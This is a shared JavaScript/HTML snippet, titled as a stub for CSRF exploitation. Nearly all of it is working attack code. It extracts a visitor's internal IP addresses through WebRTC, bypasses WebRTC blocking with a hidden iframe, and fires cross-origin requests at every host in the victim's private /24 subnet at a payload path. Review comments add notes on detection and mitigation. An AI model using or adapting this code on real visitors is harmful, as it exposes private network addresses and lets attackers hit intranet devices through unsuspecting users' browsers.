JS STUB full internal network test (useful for CSRF exploitation)
| <html> | |
| <script> | |
| //get the IP addresses associated with an account | |
function getIPs(callback) {
  // Collects the IPv4 addresses that this browser exposes through WebRTC ICE
  // candidates (both the onicecandidate events and the local SDP read back
  // after a fixed delay) and hands each distinct address to `callback(ip)`.
  // @param {function(string)} callback - called once per unique dotted-quad
  //   string; nothing is returned to the caller of getIPs itself.
  // NOTE(review): the whole routine depends on browser globals (`window`,
  // `iframe`) and runs asynchronously; it cannot be exercised outside a browser.

  // Addresses already reported, keyed by the dotted-quad string (dedupe set).
  var ip_dups = {};
  //compatibility for firefox and chrome
  var RTCPeerConnection = window.RTCPeerConnection
    || window.mozRTCPeerConnection
    || window.webkitRTCPeerConnection;
  var useWebKit = !!window.webkitRTCPeerConnection;
  //bypass naive webrtc blocking using an iframe
  if(!RTCPeerConnection){
    //NOTE: you need to have an iframe in the page right above the script tag
    //
    //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
    //<script>...getIPs called in here...
    //
    // `iframe` is never declared in this file; per the note above it is expected
    // to resolve to the element with id="iframe". If that element is absent this
    // line throws a ReferenceError and nothing below runs.
    var win = iframe.contentWindow;
    RTCPeerConnection = win.RTCPeerConnection
      || win.mozRTCPeerConnection
      || win.webkitRTCPeerConnection;
    useWebKit = !!win.webkitRTCPeerConnection;
  }
  //minimal requirements for data connection
  var mediaConstraints = {
    optional: [{RtpDataChannels: true}]
  };
  //firefox already has a default stun server in about:config
  // media.peerconnection.default_iceservers =
  // [{"url": "stun:stun.services.mozilla.com"}]
  var servers = undefined;
  //add same stun server for chrome
  // Only the WebKit path gets an explicit STUN server; elsewhere `servers`
  // stays undefined and whatever the browser defaults to is used.
  if(useWebKit)
    servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
  //construct a new RTCPeerConnection
  var pc = new RTCPeerConnection(servers, mediaConstraints);

  // Extracts the first IPv4 literal from a candidate string and reports it
  // once. `candidate` is either an ice.candidate.candidate value or a raw
  // "a=candidate:" SDP line (see the two call sites below).
  function handleCandidate(candidate){
    //match just the IP address
    var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
    // NOTE(review): exec() returns null when the candidate carries no IPv4
    // literal (an IPv6 candidate, or a browser that emits mDNS ".local" host
    // candidates instead of raw addresses), so the [1] access below throws a
    // TypeError and the remaining candidates are not processed — confirm
    // against the browsers in scope.
    var ip_addr = ip_regex.exec(candidate)[1];
    //remove duplicates
    if(ip_dups[ip_addr] === undefined)
      callback(ip_addr);
    ip_dups[ip_addr] = true;
  }
  //listen for candidate events
  pc.onicecandidate = function(ice){
    //skip non-candidate events
    if(ice.candidate)
      handleCandidate(ice.candidate.candidate);
  };
  //create a bogus data channel
  // The channel is never used; it only makes the offer include ICE candidates.
  pc.createDataChannel("");
  //create an offer sdp
  // Legacy callback form of createOffer/setLocalDescription; both error
  // callbacks are no-ops, so failures here are silently dropped.
  pc.createOffer(function(result){
    //trigger the stun server request
    pc.setLocalDescription(result, function(){}, function(){});
  }, function(){});
  //wait for a while to let everything done
  // Hard-coded 1 s grace period: after it, the local SDP is re-scanned for
  // "a=candidate:" lines as a fallback to the event handler above. Candidates
  // that appear only after this point are missed.
  setTimeout(function(){
    //read candidate info from local description
    var lines = pc.localDescription.sdp.split('\n');
    lines.forEach(function(line){
      if(line.indexOf('a=candidate:') === 0)
        handleCandidate(line);
    });
  }, 1000);
}
// Entry point: for every private IPv4 address getIPs reports, fire one
// fire-and-forget GET at each of the 255 hosts in the same /24.
// Defender notes (grounded in the loop below): the requests are unauthenticated
// cross-origin GETs to a fixed path, no response is ever read, and they are
// issued as a tight sequential burst from a single browser — that burst
// (same path, consecutive last octets, one client) is the observable signal
// in web-server and proxy logs. Endpoints that require a CSRF token or an
// Origin/SameSite check are not affected by a request shaped like this.
getIPs(
  function(ip){
    // Log the identified internal IP
    console.log(ip);
    // Extract a /24 portion and execute an attack
    // Unanchored prefix match; the matched prefix (e.g. "10.1.2.") becomes
    // the subnet string the last octet is appended to.
    var local_regex = /10\.[0-9]+\.[0-9]+\.|192\.168\.[0-9]+\.|172\.16\./
    var exploit_URI_payload = "/test";
    if (local_regex.exec(ip) != null) {
      // exec() is evaluated a second time here for the same `ip`; the result
      // is the same as the check above.
      var subnet = local_regex.exec(ip)[0];
      // NOTE(review): `node` is assigned without var/let and so becomes an
      // implicit global (this page has no 'use strict').
      for (node=1; node<256; node++) {
        var url = 'http://' + subnet + node + exploit_URI_payload;
        var oReq = new XMLHttpRequest();
        // Async GET; no onload/onerror handler is attached, so the outcome
        // of each request is discarded.
        oReq.open("get",url,true)
        oReq.send();
      }
    }
  }
);
| </script> | |
| <H1>test</H1></html> |
Can't remember the original source.
Modified a bit